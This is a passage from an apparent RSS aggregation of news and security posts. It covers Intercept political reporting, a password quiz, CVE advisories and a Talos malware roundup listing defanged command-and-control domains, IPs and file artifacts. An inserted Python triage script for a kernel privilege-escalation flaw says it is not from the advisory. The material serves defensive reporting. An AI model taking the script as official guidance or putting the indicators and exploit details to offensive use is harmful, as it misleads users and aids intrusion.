While the diplomatic footprint has been light, the U.S. has continued to bolster itself militarily in Somalia. In 2015, news broke about secret U.S. drone bases where a handful of special forces were stationed. One of those bases was at Baledogle, which has been fast expanding and is now a forward operating base with hundreds of beds. Last month, the Pentagon invested $12 million for “emergency runway repairs” there.

Reporting for this story was supported with funding from the Investigative Fund.

The post U.S. Returns to Mogadishu With Revamped Diplomatic Outpost, 25 Years After “Black Hawk Down” Battle appeared first on The Intercept.

Alchemy and Science: Fantastic Beasts’ real-life connection to a 14th century Parisian scribe

With the new Fantastic Beasts film — the second in the franchise, J.K. Rowling takes audiences deeper into the world that pre-dated Harry Potter and his friends. Newt Scamander’s 1920s New York and Europe is alive with wizardry, magic and…alchemy. Rowling has often drawn from mythology and folklore to create the Potter universe, with key elements like the philosopher’s stone and the real life alchemist who discovered it having a place in true history…. strengthening the connection bet

Japan’s Cybersecurity Minister Admits He’s ‘Never Used A Computer’

Japan’s new cybersecurity minister has ‘never used a computer’–claiming to have delegated to staff and secretaries since he was 25. This is especially interesting because his duties include overseeing cyber-defense preparations for the 2020 Olympic Games in Tokyo. In addition, Sakurada allegedly struggled to answer a follow-up question about whether USB drives were in use at the country’s nuclear power stations.

With cybercrime expected to cost global businesses over $2 trillion by 2019, this revelation has raised concern, and the impact could weigh on Japan’s state of cybersecurity.

Two cybersecurity experts have commented on the incident below.

Bryan Becker, Application Security Researcher at WhiteHat Security:

“With Japan’s new Cybersecurity Minister Yoshitaka Sakurada admitting he’s never used a computer in his life, we can expect to see some unusual developments coming from their end. Remember when Zuckerberg was interviewed by a special hearing, and senators asked him questions as if they had never used the internet before? Not to be outdone, Sakurada is going to be developing policy without even having used a computer before!

All of that aside, if Sakurada is going to be effective, one likely option would be for him to turn to the private sector for help. There are probably going to be some very lucrative contracts available for partnerships with the Japanese government in the near future.

On the other hand, there is something to be said of the security of a man who’s never used a computer in his life. You can’t hack something that’s not there!”

Jeremy Cheung, Vulnerability Verification Specialist at WhiteHat Security:

“Whereas it’s generally possible for someone to be in a managerial position, without holding any technical expertise, it isn’t ideal for achieving high-quality results. Due to the nature of the cybersecurity industry involving not only technical devices but private data and personally identifiable information, the ramifications of someone in this position not holding any hands-on industry experience are quite severe. Without having ever even used a computer, Sakurada’s knowledge of cybersecurity practices, exploits and remediation are theoretical at best, which greatly increases the chance of compromise and a potential repeat of the Pyeongchang Winter Olympic Games Cyberattack. In preparation for the 2020 Olympic Games, Sakurada should definitely get in the trenches with his staff and experience what goes on in building a secure cyber-defense plan. To stop a hacker, you have to try to think like a hacker!”

The ISBuzz Post: This Post Japan’s Cybersecurity Minister Admits He’s ‘Never Used A Computer’ appeared first on Information Security Buzz.

Google Cloud Executive Who Sought Pentagon Contract Steps Down

Diane Greene, whose pursuit of Pentagon contracts for artificial intelligence technology sparked a worker uprising at Google, is stepping down as chief executive of the company's cloud computing business (Warning: source may be paywalled; alternative source). "Ms. Greene said she would stay on as chief executive until January. She will be replaced by Thomas Kurian, who oversaw product development at Oracle until his resignation in October. Ms. Greene will remain a board director at Google's parent company, Alphabet," reports The New York Times. From the report: The change in leadership caps a turbulent three years for Ms. Greene, who was brought on to expand Google's cloud computing business. Google Cloud has struggled to make major inroads in persuading corporate customers to use its computing infrastructure over alternatives like Amazon's A.W.S. and Microsoft's Azure. In a blog post published by the company, Ms. Greene said she had initially told friends and family that she was planning to run Google Cloud for only two years but stayed for three. Ms. Greene, a widely respected technologist and entrepreneur, said that after leaving Google Cloud, she planned to help female founders of companies by investing in and mentoring them. Ms. Greene joined Google in 2015 when it acquired Bebop, a start-up she had founded, for $380 million. Ms. Greene defended Google's pursuit of a Defense Department contract for the Maven program, which uses AI to interpret video images and could be used to improve the targeting of drone strikes. In March, she said it was a small contract worth "only" $9 million and that the technology would be used for nonlethal purposes.

Read more of this story at Slashdot.

DigiByte (DGB) Recovers 15% as Testing Begins on ASIC-Defeating Algorithm

DigiByte (DGB) showed strong signs of recovery on Friday, as the coin price made up 15% of its value after the recent market dip. Testing has begun on a self-adjusting algorithm which changes itself every ten days. According to the DigiByte team, and founder Jared Tate, such a move would see the threat of ASIC […]

The post DigiByte (DGB) Recovers 15% as Testing Begins on ASIC-Defeating Algorithm appeared first on Hacked: Hacking Finance.

Naked Security – Sophos: Could have sworn I deleted that photo from my phone! [PODCAST]

This week: hacking phones at Pwn2Own, the brand new SophosLabs Threat report, and squeezing Shakespeare into one tweet. Enjoy!
Download audio: http://feeds.soundcloud.com/stream/531032670-sophossecurity-ep-009-competitive-hacking-threat-report-and-crazy-tweets.mp3

Naked Security - Sophos

Linux 4.20 is Running Slower Than 4.19 On Intel CPUs

Freshly Exhumed writes: An intentional kernel change in Linux kernel 4.20 for enhanced Spectre mitigation is unfortunately causing Intel Linux performance to be much slower than with 4.19. That change is 'STIBP' (Single Thread Indirect Branch Predictors), which allows for preventing cross-hyperthread control of decisions that are made by indirect branch predictors. It affects Intel systems that have up-to-date microcode and CPU Hyper Threading enabled. Phoronix gives the evidence.

Read more of this story at Slashdot.

What Your Password Says About You

At the end of last year, a survey revealed that the most popular password was still “123456,” followed by “password.” These highly hackable choices persist despite years of education around the importance of password security. So, what does this say about people who pick simple passwords? Most likely, they are shooting for a password that is easy to remember rather than super secure.

The urge to pick simple passwords is understandable given the large number of passwords that are required in our modern lives, from banking, social media, and online services to simply unlocking our phones. But choosing weak passwords can be a major mistake, opening you up to theft and identity fraud.

Even if you choose complicated passwords, the recent rash of corporate data breaches means you could be at even greater risk by repeating passwords across accounts. When you repeat passwords, all a hacker needs to do is breach one service provider to obtain a password that can unlock a string of accounts, including your online banking services. These accounts often include identity information, leaving you open to impersonation. The bad guys could open up fraudulent accounts in your name, for example, or even collect your health benefits.

So, now that you know the risks of weak password security, let’s see what your password says about you. Take this quiz to find out, and don’t forget to review our password safety tips below!

Password Quiz – Answer “Yes” or “No”

  1. Your passwords don’t include your address, birthdate, anniversary, or pet’s name.
  2. You don’t repeat passwords.
  3. Your passwords are at least 8 characters long and include numbers, upper and lower case letters, and special characters.
  4. You change default passwords on devices to something hard to guess.
  5. You routinely lock your phone and devices with a passcode or fingerprint.
  6. You don’t share your passwords with people you’re dating or friends.
  7. You use a password manager.
  8. If you write your passwords down, you keep them hidden in a safe place, where no one else can find them.
  9. You get creative with answers to security questions to make them harder to guess. For example, instead of naming the city where you grew up, you name your favorite city, so someone who simply reads your social media profile cannot guess the answer.
  10. You make sure no one is watching when you type in your passwords.
  11. You try to make your passwords memorable by including phrases that have meaning to you.
  12. You use multi-factor authentication.

Now, give yourself 1 point for each question you answered “yes” to, and 0 points for each question you answered “no” to. Add them up to see what your password says about you.

9-12 points

You’re a Password Pro!

You take password security seriously and know the importance of using unique, complicated passwords for each account. Want to up your password game? Use multi-factor authentication, if you don’t already. This is when you use more than one method to authenticate your identity before logging in to an account, such as typing in a password, as well as a code that is sent to your phone via text message.

4-8 points

You’re a Passable Passworder

You go through the basics, but when it comes to making your accounts as secure as they can be you sometimes skip important steps. Instead of creating complicated passwords yourself—and struggling to remember them—you may want to use a password manager, and let it do the work for you. Soon, you’ll be a pro!

1-3 points

You’re a Hacker’s Helper

Uh oh! It looks like you’re not taking password security seriously enough to ensure that your accounts and data stay safe. Start by reading through the tips below. It’s never too late to upgrade your passwords, so set aside a little time to boost your security.

Key Tips to Become a Password Pro:

  • Always choose unique, complicated passwords—Try to make sure they are at least 8 characters long and include a combination of numbers, letters, and special characters. Don’t repeat passwords for critical accounts, like financial and health services, and keep them to yourself. Also, consider using a password manager to help create and store unique passwords for you. This way you don’t have to write passwords down or memorize them. Password managers are sometimes offered as part of security software.
  • Make your password memorable—We know that people continue to choose simple passwords because they are easier to remember, but there are tricks to creating complicated and memorable passwords. For instance, you can string random words together that mean something to you, and intersperse them with numbers and special characters. Or, you can choose random letters that comprise a pattern only known to you, such as the first letter in each word of a sentence in your favorite book.
  • Use comprehensive security software—Remember, a strong password is just the first line of defense. Back it up with robust security software that can detect and stop known threats, help you browse safely, and protect you from identity theft.

The post What Your Password Says About You appeared first on McAfee Blogs.

CVE-2018-15769

RSA BSAFE Micro Edition Suite versions prior to 4.0.11 (in 4.0.x series) and versions prior to 4.1.6.2 (in 4.1.x series) contain a key management error issue. A malicious TLS server could potentially cause a Denial Of Service (DoS) on TLS clients during the handshake when a very large prime value is sent to the TLS client, and an Ephemeral or Anonymous Diffie-Hellman cipher suite (DHE or ADH) is used.

Air Quality in San Francisco is So Bad that Uber Drivers Are Selling Masks Out of Their Cars

California's devastating wildfires are causing unhealthy air conditions for locals breathing in harmful fumes. From a report: In San Francisco, which currently has the second-worst-rated air quality out of any city in the world, one driver was spotted selling N95 respirator masks for $5 apiece. That's significantly above market rate. Right now you can buy a 10-pack of similar masks for about $13 on Amazon. But considering the masks are sold out at many local stores, riders may be willing to dish out the cash for immediate access to the protective gear. Further reading: California needs to reinvent its fire policies, or the death and destruction will go on.

Read more of this story at Slashdot.

Firefox adds in-browser notification of breached sites

Mozilla has added a data breach notification to Firefox that warns the browser's users when their email address and credentials may have been obtained by hackers.

Dubbed Firefox Monitor, the free breach notification service debuted in September after some testing during the summer. Anyone -- not only Firefox users -- can steer to the service website, enter an email address and be told if that address was among those involved in successful, publicly-known breach attacks. Next steps were up to the user, including the obvious of changing the password(s) connected to that email address and/or website(s).

Notifications of the latest breaches were sent by Firefox Monitor to the user-submitted address. "Your email address will be scanned against those data breaches, and we'll let you know through a private email if you were involved," wrote Nick Nguyen, Mozilla's vice president of product strategy, in a Sept. 25 post to a company blog.

Market Update: U.S. Stocks Steady After Turbulent Week; Bitcoin ABC Leads Hash War

U.S. stocks finished mostly higher in turbulent trading Friday, as the large-cap S&P 500 Index eked out its second consecutive advance on the back of utilities and energy companies. Cryptocurrencies appear to have stabilized following a $37 billion plunge, as the primary implementation of the bitcoin cash hard fork continued to edge out the competing […]

The post Market Update: U.S. Stocks Steady After Turbulent Week; Bitcoin ABC Leads Hash War appeared first on Hacked: Hacking Finance.

Amazon Has Everything it Needs To Make Massively Popular Algorithm-Driven Fiction

Thu-Huong Ha, writing for Quartz: Amazon's power in books extends way beyond its ability to sell them super cheap and super fast. This year, a little over 40% of the print books sold in the US moved through the site, according to estimates from Bookstat, which tracks US online book retail. (NPD, which tracks 85% of US trade print sales, declined to provide data broken out by retailer.) In the US, Amazon dominates ebook sales and hosts hundreds of thousands of self-published ebooks on its platforms, many exclusively. It looms over the audiobook scene, in retail as well as production, and is one of the biggest marketplaces for used books in the US. Amazon also makes its own books -- more than 1,500 last year. All that power comes with great data, which Amazon's publishing arm is well positioned to exploit in the interest of making books tailored exactly to what people want -- down to which page characters should meet on or how many lines of dialogue they should exchange. Though Amazon declined to comment specifically on whether it uses data to shape or determine the content of its own books, the company acknowledged that authors are recruited for their past sales (as is common in traditional publishing). "Amazon Publishing titles are thoughtfully acquired by our team -- made up of publishing-industry veterans and long-time Amazonians -- with many factors taken into consideration," says Amazon Publishing publisher Mikyla Bruder, "including the acquiring editor's enthusiasm, the strength of the story, quality of the writing, editorial fit for our list, and author backlist/comparable titles' sales track." Amazon's Kindle e-reader, first released in 2007, is a data-collection device that doubles as reading material. Kindle knows the minutiae of how people read: what they highlight, the fonts they prefer, where in a book they lose interest, what kind of books they finish quickly, and which books gets skimmed rather than read all the way through. 
A year after the Kindle came out, Amazon acquired Audible. Audiobooks have been a rare bright spot in the publishing industry, with double-digit growth in total sales for the past few years. Audible now touts itself as the "world's largest seller and producer of downloadable audiobooks and other spoken-word entertainment," and its site has around 450,000 audio programs.

Read more of this story at Slashdot.

CVE-2018-18955

In the Linux kernel 4.15.x through 4.19.x before 4.19.2, map_write() in kernel/user_namespace.c allows privilege escalation because it mishandles nested user namespaces with more than 5 UID or GID ranges. A user who has CAP_SYS_ADMIN in an affected user namespace can bypass access controls on resources outside the namespace, as demonstrated by reading /etc/shadow. This occurs because an ID transformation takes place properly for the namespaced-to-kernel direction but not for the kernel-to-namespaced direction.
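A defender-side triage check for this issue, added here as an example and not taken from the advisory or the kernel tree: it compares a `uname -r` string with the upstream range quoted above and counts the extents in `/proc/<pid>/uid_map` and `gid_map`. The function names and the sample maps are constructed for illustration, and the version test looks only at the number, so a distribution kernel that backported the fix will still match.

```python
"""Triage helper for CVE-2018-18955 (added example; all names are illustrative)."""
import os
import platform
import re

# Upstream range as worded in the advisory: 4.15.x through 4.19.x before 4.19.2.
FIRST_AFFECTED = (4, 15, 0)
FIRST_FIXED = (4, 19, 2)
# The advisory ties the flaw to maps with more than 5 UID or GID ranges.
EXTENT_THRESHOLD = 5

# Constructed sample inputs, in the "inside outside count" layout of uid_map.
SAMPLE_INITIAL_MAP = "         0          0 4294967295\n"
SAMPLE_SIX_EXTENTS = (
    "0 100000 1000\n1000 1000 1\n1001 101001 1000\n"
    "2001 200000 1000\n3001 300000 1000\n4001 400000 1000\n"
)


def parse_release(release):
    """Turn a `uname -r` style string into (major, minor, patch)."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release.strip())
    if m is None:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    return tuple(int(part) if part else 0 for part in m.groups())


def upstream_version_affected(release):
    """True when the version number falls inside the advisory's range.

    A True result means "check the vendor advisory", not "confirmed
    vulnerable": backported fixes are invisible in the version number.
    """
    return FIRST_AFFECTED <= parse_release(release) < FIRST_FIXED


def parse_id_map(text):
    """Parse uid_map/gid_map content into (inside, outside, count) extents."""
    extents = []
    for lineno, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if not fields:
            continue
        if len(fields) != 3 or not all(f.isdigit() for f in fields):
            raise ValueError(f"line {lineno}: expected three integers: {line!r}")
        extents.append(tuple(int(f) for f in fields))
    return extents


def assess(release, uid_map_text, gid_map_text):
    """Combine the version test with the extent counts for one process."""
    in_range = upstream_version_affected(release)
    uid_n = len(parse_id_map(uid_map_text))
    gid_n = len(parse_id_map(gid_map_text))
    many = uid_n > EXTENT_THRESHOLD or gid_n > EXTENT_THRESHOLD
    return {
        "version_in_range": in_range,
        "uid_extents": uid_n,
        "gid_extents": gid_n,
        "review": in_range and many,
    }


def scan_proc(proc_root="/proc"):
    """Return [(pid, uid_extents, gid_extents)] for maps over the threshold.

    Processes that exit mid-scan or cannot be read are skipped.
    """
    hits = []
    for name in sorted(os.listdir(proc_root)):
        if not name.isdigit():
            continue
        counts = []
        try:
            for fname in ("uid_map", "gid_map"):
                with open(os.path.join(proc_root, name, fname)) as fh:
                    counts.append(len(parse_id_map(fh.read())))
        except (OSError, ValueError):
            continue
        if max(counts) > EXTENT_THRESHOLD:
            hits.append((int(name), counts[0], counts[1]))
    return hits


if __name__ == "__main__":
    rel = platform.release()
    print(rel, "inside advisory range:", upstream_version_affected(rel))
    for pid, uid_n, gid_n in scan_proc():
        print(f"pid {pid}: {uid_n} uid extents, {gid_n} gid extents")
```

Run it as root on a Linux host to cover every process; an empty result from `scan_proc()` means no running process currently holds a map with more than 5 extents.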

Mailing Tech Support a Bomb

I understand his frustration, but this is extreme:

When police asked Cryptopay what could have motivated Salonen to send the company a pipe bomb -- or, rather, two pipe bombs, which is what investigators found when they picked apart the explosive package -- the only thing the company could think of was that it had declined his request for a password change.

In August 2017, Salonen, a customer of Cryptopay, emailed their customer services team to ask for a new password. They refused, given that it was against the company's privacy policy.

A fair point, as it's never a good idea to send a new password in an email. A password-reset link is safer all round, although it's not clear if Cryptopay offered this option to Salonen.

Oops: House Democrats Mistakenly Cast Votes Blocking Resolution on Ending Yemen War

In a political maneuver that was equal parts bizarre and grimly predictable, Republican leaders on Capitol Hill moved yet again on Wednesday to block a vote to wind down U.S. military support for the war in Yemen, this time by tucking a parliamentary procedure into a rule governing legislation that removes gray wolves from the endangered species list.

The measure narrowly passed with a 201-187 vote, preventing any action on the war in Yemen this legislative session.

What’s more, several of the co-sponsors of the Yemen resolution to end the war either voted to advance the wolf bill or abstained from the vote entirely, meaning that they played a part in preventing their own bill from reaching the House floor.

Adding to the confusion, two of the six House Democrats who joined Republicans in beating back the Yemen bill have told The Intercept that they cast their votes in error.

“Mr. Vela’s vote was actually mistake – we are in the process of changing it,” wrote Mickeala Carter, a spokesperson for Rep. Filemon Vela, D-Texas, who voted for the rule that prevented the Yemen vote.

Rep. Anna Eshoo, D-Calif., is a co-sponsor of the Yemen legislation, which invokes the 1973 War Powers Act to compel the Trump administration to remove U.S. forces from “hostilities” related to the Saudi Arabia-led intervention. Eshoo voted for the measure blocking her own resolution from reaching the floor, a move that puzzled human rights advocates.

“She is a cosponsor of the Resolution and made a mistake on the vote,” wrote Emma Crisci, a spokesperson for Eshoo’s office, in an email to The Intercept. “The Congresswoman is submitting a statement for the Congressional Record saying that she made a mistake in voting and meant to vote NO on the rule.”

Four other House Democrats — Reps. Gene Green and Vicente González of Texas, Collin Peterson of Minnesota, and Jim Costa of California — also voted for the rule to prevent the Yemen bill from reaching the floor, and did not respond to a request for comment.

Rep. Ken Buck, R-Colo., signed on as a co-sponsor of the legislation to wind down the war in Yemen in October. Buck was selected by GOP leadership this cycle to serve on the House Rules Committee, a powerful post that determines the fate of legislation. Curiously, Buck abstained from the House Rules Committee vote on the rule undercutting his own bill when leadership moved to combine the provision curbing the Yemen vote with the wolf legislation, and then voted in favor of the rule when it reached the floor on Wednesday. Buck also did not respond to a request for comment.

Congress never authorized U.S. support for the war in Yemen, but the American military provides backing for the bloody conflict, which has taken more than 10,000 lives and threatens more than 14 million people with imminent famine.

As the crisis worsens, human rights activists continue to urge an end to the war.

Last week, the U.S. military said it would discontinue refueling coalition warplanes bombing Yemen. But the United States continues to play a pivotal role in the war, providing U.S.-manufactured arms and logistical support to UAE and Saudi forces occupying Yemen and blockading the country’s ports.

David Segal, a co-founder of the activist group Demand Progress, said that Eshoo’s “mistaken vote was unfortunate,” but that she “should be applauded for co-sponsorship of the underlying resolution, and she will hopefully have the opportunity to vote to end our involvement in the war on Yemen through another War Powers Resolution in coming months.”

Segal, however, noted that several of the Democrats voting with the Republican majority to kill the Yemen bill this session have long supported the conflict. Green, for example, voted in 2016 to support the transfer of cluster bombs to Saudi Arabia, and has been “more complicit than the average Democrat in the decimation of Yemen,” Segal said.

Segal has long advocated on the issue. He previously served in the Rhode Island state legislature, where he pressed Textron, the defense contractor that once manufactured cluster munitions, on ending the development of the weapon.

Still, when the new class of House Democrats elected in the midterms this year takes office in January, the lead sponsors of the Yemen resolution plan to reintroduce the bill, which now has the support of much of House Democratic leadership.

The post Oops: House Democrats Mistakenly Cast Votes Blocking Resolution on Ending Yemen War appeared first on The Intercept.

Threat Roundup for Nov. 9 to Nov. 16



Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 09 and Nov. 16. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

You can find an additional JSON file here that includes the IOCs in this post, as well as all hashes associated with the cluster. That list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.

The most prevalent threats highlighted in this roundup are:

  • Win.Ransomware.Gandcrab-6748603-0
    Ransomware
    Gandcrab is ransomware that encrypts documents, photos, databases and other important files using the file extension ".GDCB", ".CRAB" or ".KRAB." It's spread through traditional spam campaigns, as well as multiple exploit kits, including Rig and Grandsoft.
     
  • Win.Virus.Parite-6748128-0
    Virus
    Parite is a polymorphic file infector. It infects executable files on the local machine and on network drives.
     
  • Win.Malware.Dijo-6748031-0
    Malware
    Win.Malware.DIJO, also known as Ursnif, is used to steal sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits.
     
  • Win.Malware.Vobfus-6747720-0
    Malware
    Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will run when the system is booted. Once installed, it attempts to download follow-on malware from its command and control (C2) servers.
     
  • Win.Downloader.Upatre-6746951-0
    Downloader
    Upatre is a malicious downloader often used by exploit kits and phishing campaigns. Upatre downloads and executes malicious executables, such as banking malware.
     
  • Win.Malware.Emotet-6745295-0
    Malware
    Emotet is a banking trojan that has remained relevant due to its continual evolution to bypass antivirus products. It is commonly spread via malicious emails.
     

Threats

Win.Ransomware.Gandcrab-6748603-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • Global\pc_group=WORKGROUP&ransom_id=4a6a799098b68e3c
  • \BaseNamedObjects\Global\pc_group=WORKGROUP&ransom_id=ab8e4b3e3c28b0e4
  • Global\7bf1bf81-e78a-11e8-a007-00501e3ae7b5
IP Addresses contacted by malware. Does not indicate maliciousness
  • 66[.]171[.]248[.]178
Domain Names contacted by malware. Does not indicate maliciousness
  • ipv4bot[.]whatismyipaddress[.]com
Files and or directories created
  • %AllUsersProfile%\Microsoft\Crypto\RSA\S-1-5-18\6d14e4b1d8ca773bab785d1be032546e_d19ab989-a35f-4710-83df-7b2db7efe7c5
  • %AppData%\Microsoft\umitoa.exe
  • %AppData%\Microsoft\hhbbvc.exe
  • \Win32Pipes.000006c8.00000045
  • \Win32Pipes.000006c8.00000047
  • \Win32Pipes.000006c8.00000049
File Hashes

Coverage

Screenshots of Detection: AMP, ThreatGrid

Win.Virus.Parite-6748128-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • Residented
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • %AppData%\Wplugin.dll
  • %WinDir%\Wplugin.dll
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\yma1.tmp
  • %LocalAppData%\Temp\neb2886.tmp
File Hashes

Coverage

Screenshots of Detection: AMP, ThreatGrid

Win.Malware.Dijo-6748031-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 95[.]181[.]198[.]115
  • 192[.]162[.]244[.]171
Domain Names contacted by malware. Does not indicate maliciousness
  • resolver1[.]opendns[.]com
  • 222[.]222[.]67[.]208[.]in-addr[.]arpa
  • myip[.]opendns[.]com
  • www[.]bing[.]com
  • hq92lmdlcdnandwuq[.]com
  • cyanteread[.]com
  • tmencedfur[.]com
Files and or directories created
  • %LocalAppData%\Temp\RESB9BE.tmp
  • %LocalAppData%\Temp\CSCE580781F303F45AE9F8858B262C2D7E7.TMP
  • %LocalAppData%\Temp\9DF6.bin
  • %LocalAppData%\Temp\CB8E.bin
  • %LocalAppData%\Temp\3F14.bi1
  • %LocalAppData%\Temp\RESBCAB.tmp
  • %LocalAppData%\Temp\CSC8B3FB8E53BAD4C5CA67A2B1CAEA0ABB3.TMP
  • %LocalAppData%\Temp\5mq30dkw.2sp.psm1
  • %LocalAppData%\Temp\jrz15mzo.uwv.ps1
  • %LocalAppData%\Temp\lajoenvy.0.cs
  • %LocalAppData%\Temp\lajoenvy.cmdline
  • %LocalAppData%\Temp\lajoenvy.dll
  • %LocalAppData%\Temp\lajoenvy.err
  • %LocalAppData%\Temp\lajoenvy.out
  • %LocalAppData%\Temp\lajoenvy.tmp
File Hashes

Coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella

Win.Malware.Vobfus-6747720-0


Indicators of Compromise


Registry Keys
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: muehe
Mutexes
  • \BaseNamedObjects\A
  • A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • ns1[.]chopsuwey[.]org
  • ns1[.]chopsuwey[.]biz
  • ns1[.]chopsuwey[.]info
  • ns1[.]chopsuwey[.]com
  • ns1[.]chopsuwey[.]net
Files and or directories created
  • \??\E:\autorun.inf
  • \autorun.inf
  • \??\E:\System Volume Information.exe
  • \System Volume Information.exe
  • \$RECYCLE.BIN.exe
  • \??\E:\$RECYCLE.BIN.exe
  • \Secret.exe
  • \??\E:\Passwords.exe
  • \??\E:\Porn.exe
  • \??\E:\Secret.exe
  • \??\E:\Sexy.exe
  • \??\E:\x.mpeg
  • \Passwords.exe
  • \Porn.exe
  • \Sexy.exe
  • %SystemDrive%\Documents and Settings\Administrator\sauuyi.exe
  • %UserProfile%\muehe.exe
  • \??\E:\RCXFF.tmp
  • \??\E:\muehe.exe
  • \RCXFBD0.tmp
  • \RCXFF.tmp
  • \muehe.exe
File Hashes

Coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella

Win.Downloader.Upatre-6746951-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 195[.]38[.]137[.]100
Domain Names contacted by malware. Does not indicate maliciousness
  • drippingstrawberry[.]com
Files and or directories created
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ffengh.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\hfsrfgs.exe
  • %LocalAppData%\Temp\ffengh.exe
  • hfsrfgs.exe
File Hashes

Coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella

Win.Malware.Emotet-6745295-0


Indicators of Compromise


Registry Keys
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\GENRALNLA
    • Value Name: ObjectName
Mutexes
  • Global\I98B68E3C
  • Global\M98B68E3C
  • PEM19C
  • PEM52C
  • PEM748
  • PEM43C
  • PEM20C
IP Addresses contacted by malware. Does not indicate maliciousness
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • N/A
File Hashes

Coverage

Screenshots of Detection: AMP, ThreatGrid

Microsoft is Testing Ads in Mail App For Windows 10 in Select Markets

Mark Wilson writes: Ads in your inbox. Sounds like something you'd expect from the likes of Google or Yahoo, but Microsoft appears to be about to get in on the act as well. And we're not talking about online ads in your Outlook.com account -- we're talking about ads in the Mail app that's included with Windows 10. A new report says that Microsoft is currently testing ads with Windows Insiders, so it could be just a matter of time before they spread wider. In a support page, spotted first by news outlet Thurrott, Microsoft says, "Consistent with consumer email apps and services like Outlook.com, Gmail, and Yahoo Mail, advertising allows us to provide, support, and improve some of our products. We're always experimenting with new features and experiences. Currently, we have a pilot running in Brazil, Canada, Australia, and India to get user feedback on ads in Mail."

Read more of this story at Slashdot.

UK and EU Draft Withdrawal Agreement

On November 14, 2018, the UK government and the EU agreed upon the text of a draft Withdrawal Agreement in relation to the UK’s impending exit from the European Union on March 29, 2019. The draft Withdrawal Agreement provides for a transition period under which the UK will remain subject to a number of its EU membership obligations, during the period starting when the UK leaves the EU on March 29, 2019 to the end of the transition period on December 31, 2020. The draft Withdrawal Agreement provides the following in relation to data protection law:

  • EU data protection law, including the General Data Protection Regulation (“GDPR”) and the e-Privacy Directive, will continue to apply to personal data of data subjects outside the UK that are (i) processed in the UK in accordance with the GDPR before the end of the transition period on December 31, 2020, and (ii) processed in the UK after the end of the transition period on the basis of the draft Withdrawal Agreement.
  • To the extent that a declaration stating that the UK provides an adequate level of protection is issued by the European Commission during the transition period, then EU data protection law (including the GDPR and the e-Privacy Directive) will no longer apply in the UK to personal data of data subjects outside the UK. If, however, such declaration of adequacy ceases to be applicable, the UK commits to ensuring an adequate level of protection for the processing of the relevant personal data that is essentially equivalent to that provided by EU data protection law. Although not explicitly stated in the text of the draft Withdrawal Agreement, this obligation appears to extend beyond the end of the transition period.
  • Notwithstanding the above, Chapter VII of the GDPR, relating to cooperation between supervisory authorities and the consistency mechanism, will not apply in the UK during the transition period. As such, organizations will not be permitted to designate the UK Information Commissioner’s Office (“ICO”) as lead authority for GDPR purposes. In addition, the ICO will, during the transition period, have a significantly limited role in relation to the European Data Protection Board. The ICO will be entitled to attend meetings of the European Data Protection Board in some cases, but will no longer have voting rights.

In practical terms, assuming that the draft Withdrawal Agreement is adopted in its current form, personal data flows between the EU and the UK will likely continue unrestricted during the transition period, until at least December 31, 2020. The draft Withdrawal Agreement itself does not, however, address the relationship between the UK and the EU after the end of the transition period, which will be subject to whatever final deal, if any, is agreed between the EU and the UK. As the draft Withdrawal Agreement is currently written, however, it appears to contemplate a declaration of adequacy in relation to the UK, which if issued would address transfers of personal data from the EU to the UK after the end of the transition period. As such, it appears that any immediate threat to personal data transfers between the UK and the EU has been staved off, and transfers are likely to continue unaffected during the transition period.

Before being agreed between the UK and the European Council, the draft Withdrawal Agreement must be approved by the UK Parliament. Following multiple resignations from Theresa May’s government yesterday, it looks increasingly unlikely that the draft Withdrawal Agreement will be approved in its current form. If the draft Withdrawal Agreement is not approved, then there remains the prospect of the UK leaving the EU without any transition period or immediate free trade agreement, or any arrangements in place to protect the free flow of personal data between the EU and UK. If, however, a new draft is proposed and agreed upon before the March deadline, it is possible that some of the non-contentious provisions (which may include those relating to data protection) could be carried over into that new proposal.

Threat Analyst Insights: Discovering the Value of Threat Intelligence From Social Media

Social media, in its simplest form, can be viewed as a networking tool that allows individuals to communicate with anyone across the globe, stay up to date on news and trending topics, and share content (and opinions) with one another. For threat researchers and analysts, however, social media is a little bit more than that — it can also be an additional source of valuable information regarding ongoing (and even future) threats.

Some examples of threat information that can be identified on social media include:

  • Threat actor communication
  • Networking and coordination
  • The sharing of vulnerabilities and exploits
  • User reporting and responses to suspicious cyber activity

Although the observation of such threat information can contribute viable context to an analyst’s research, there are a few challenges that need to be addressed when collecting and using information from social media before it can be transformed into actionable intelligence.

Privacy Rights Versus Security Concerns

